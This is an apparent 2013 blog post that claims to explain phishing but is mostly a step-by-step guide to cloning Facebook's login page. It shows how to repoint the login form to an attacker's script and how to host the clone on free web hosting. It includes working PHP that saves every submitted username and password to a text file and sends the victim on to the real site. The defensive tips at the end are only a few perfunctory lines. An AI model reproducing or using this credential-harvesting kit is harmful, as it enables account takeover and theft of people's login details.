Back to Top

Wednesday 3 April 2013

Phishing: How hackers do it and how to protect yourself

Disclaimer: This Article is for educational purposes only. Don't misuse it and the author does not take the responsibility of the damage caused by you.

My readers ask me how to hack Facebook accounts. Most of the people curious to know how hackers take control of their accounts. In this post, let me clarify those doubts.

Here, I am going to explain one of the popular social engineering attack(luring user into do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how hackers create a facebook phishing page.
Step 1:
To make a fake page of the target website , hackers simply use the source code of the website and save it as html page. In most cases , it is facebook. They go to facebook and right click on the website . Select "View source" and copy the code to notepad.

Step2:
Now search (Press ctrl +f) for keyword "action" in that code.
Here, let me explain what "action" means to. If you have some basic knowledge of web applications, then you already know about that. 'Action' is a HTML attribute that specifies where to send the form-data when a form(In our case, login-form) is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php). So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, hackers have to change the action value to their php file. So they change the value to ' action="login.php" '. Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

Step 3:
Now , they create a login.php file that will capture the entered data and redirects to original facebook page.

They open the notepad and type the following code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

They open the notepad and just save the file as "pswrds.txt" (without any contents).

Step 5:
To host their phishing page, they need a webhosting. They create a free account in free web hosting providers. Once they have created account in free hosting site, they can host their files and run. Also, their files can be viewed by visiting a specific URL provided when they create an account. For example : 'your_url_name.webhosting_domain.com'.

Now they upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. They make sure the fake page is working or not by vising your url.

Now , they have to lure people into login into their phishing page. Once you login into the page, they can see your login credentials being stored in the "pswrds.txt" file.


Protection is rather simple, but the need is to stay alert,
1. As always, do not open any untrusted mail/ attachment.
2. Check the URL of the site you are on and ensure it is "https".
3. Do not enter any personal information on pop-ups and/or on untrusted sites.
4. etc.... etc.....

These were the major steps, that you can follow.

Credits: +Tasneem Wasim+Rajat Jain